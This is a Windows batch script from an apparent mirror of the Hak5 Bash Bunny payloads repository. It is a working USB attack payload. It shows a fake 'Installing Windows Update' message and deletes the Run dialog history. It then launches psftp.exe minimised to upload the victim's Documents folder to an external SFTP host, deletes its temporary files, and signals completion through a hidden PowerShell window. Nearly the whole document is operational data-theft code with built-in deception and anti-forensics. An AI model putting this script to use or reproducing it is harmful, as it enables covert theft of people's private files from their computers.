mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
36 lines
1.8 KiB
Batchfile
36 lines
1.8 KiB
Batchfile
@echo off
|
|
@echo Installing Windows Update
|
|
|
|
REM Delete registry keys storing Run dialog history
|
|
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
|
SET sftphost=username@hostname.domain.com
|
|
SET sftppass=password
|
|
SET lootfrom=%userprofile%\Documents
|
|
SET looto=/loot
|
|
SET unique=%RANDOM%
|
|
REM Create FTP script
|
|
@echo lcd "%lootfrom%" >%TEMP%\test2.txt
|
|
@echo cd "%looto%" >>%TEMP%\test2.txt
|
|
@echo mkdir %computername%_%unique% >>%TEMP%\test2.txt
|
|
@echo cd %computername%_%unique% >>%TEMP%\test2.txt
|
|
@echo mput -r *. >>%TEMP%\test2.txt
|
|
@echo quit >>%TEMP%\test2.txt
|
|
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
|
|
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %TEMP%\PAYLOAD_FOLDER_IN_ROOT
|
|
|
|
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
|
|
copy %~dp0\..\..\psftp.exe "%TEMP%\psftp.exe"
|
|
|
|
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
|
|
REM start "" "%TEMP%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
|
|
|
|
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
|
|
start /wait /min "" "%TEMP%\psftp.exe" -pw %sftppass% %sftphost% -b "%TEMP%\test2.txt"
|
|
REM Clean Up payload parameter files
|
|
DEL %TEMP%\psftp.exe /q
|
|
DEL %TEMP%\test2.txt /q
|
|
REM Blink CAPSLOCK key (from usb_exfiltrator)
|
|
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
|
|
|
|
@cls
|
|
@exit |